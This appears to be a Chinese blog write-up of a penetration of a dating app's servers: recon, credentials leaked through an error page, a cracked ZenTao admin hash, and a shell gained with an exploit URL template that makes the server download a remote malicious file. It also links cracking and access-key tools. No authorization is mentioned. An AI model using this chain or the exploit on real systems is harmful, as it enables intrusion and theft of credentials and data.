A-A+

记一次社交app的渗透过程及工具分享

2021年09月08日 16:00 汪洋大海 暂无评论 共1585字 (阅读67 views次)

1。开局一张高端品质交友的邀请码讲起images

解析二维码得到链接http://web.test.com/?invite_code=23K1GK

先收集子域名,顺便把app丢进模拟器和AndroidKiller(简单暴力)

收集子域名常用的工具subDomainsBrute、securitytrails.com、x.threatbook.cnimages

都只得到较少的域名,其中i.test.com为一个后台地址

images

拿到域名先对其进行简单的目录扫描(dirSearch),并未得到什么有用的东西

常规思路,先对app进行抓包

images

结果常用的真机(root+magisk)和模拟器都不能正常打开,此时AndroidKiller也反编译完成,先看看再说

images

其实在此步骤之前应该先用查壳工具,看看有没有加壳。(常用ApkScan-PKID查壳工具),不过根据apk文件的目录结构可以简单判断是否加壳,后续发篇文章分享,这里,此交友软件并未加壳,此时用Ajadx打开

images

得到一个域名shine.test2.com(手动打开发现是TP框架,常规扫描和poc尝试后无果),顺便进行域名收集

在反编译的包中收集的信息并不多(一般我只进行信息收集,主要是不在行),像注释掉的测试ip,域名等信息有时候就是渗透过程中的突破口

这里分享一个工具ApkAnalyser (https://github.com/TheKingOfDuck/ApkAnalyser)

二、处理test2.com域名及ip信息

test.com域名基本没戏,这里也是本文的突破口,subDomainsBrute域名扫描结果部分域名如下

images

端口扫描结果(常用masscan,nmap太慢了)

images

其他几个ip端口开放情况差不多,其中11306为mysql,16379为redis,11211为ftp,10022为ssh,常用爆破工具如下,个人习惯只简单爆破,主要针对redis和ftp,ssh和mysql一般都放弃爆破,小字典尝试

images

处理域名或者ip webcheck,找不到原作了,知道的朋友麻烦贴一下链接

images

其中cd.test2.com 为禅道系统,版本11.6,其他尝试了弱口令及公开的poc,无果

gm.test2.com报错,让我很惊喜,得到关键信息

images

得到redis,mysql,mongdb,elastic 口令,得到口令后先对redis进行了尝试,发现密码错误,可能是测试服的原因,随即连接mysql,发现有禅道的库,对管理员MD5进行解密,人品比较好,解得开

 

 

images

 

images

进入后台,就是如何getshell了

images

通过搜索,大多数后台getshell的方法都是这个https://www.secpulse.com/archives/146782.html

怎奈这个exp,且都是通过ftp下载shell,多次复现均不成功

 

再次搜索发现这篇文章https://blog.csdn.net/qq_36197704/article/details/109385695

利用文章poc2 得到shell

exp2:index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]

 

三、拿到shell后就是提权

还是对配置文件等进行简单的信息收集,其中上传处得到

images

丢到工具去,一把梭哈,提权什么的也就不需要了

 

images

工具链接:https://github.com/shack2/SNETCracker

字典的话推荐一下这个:https://github.com/TheKingOfDuck/fuzzDicts

阿里云工具:https://github.com/mrknow001/aliyun-accesskey-Tools

 

文字作者:nansec

原文地址:https://www.t00ls.net/thread-62575-3-1.html

 

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

给我留言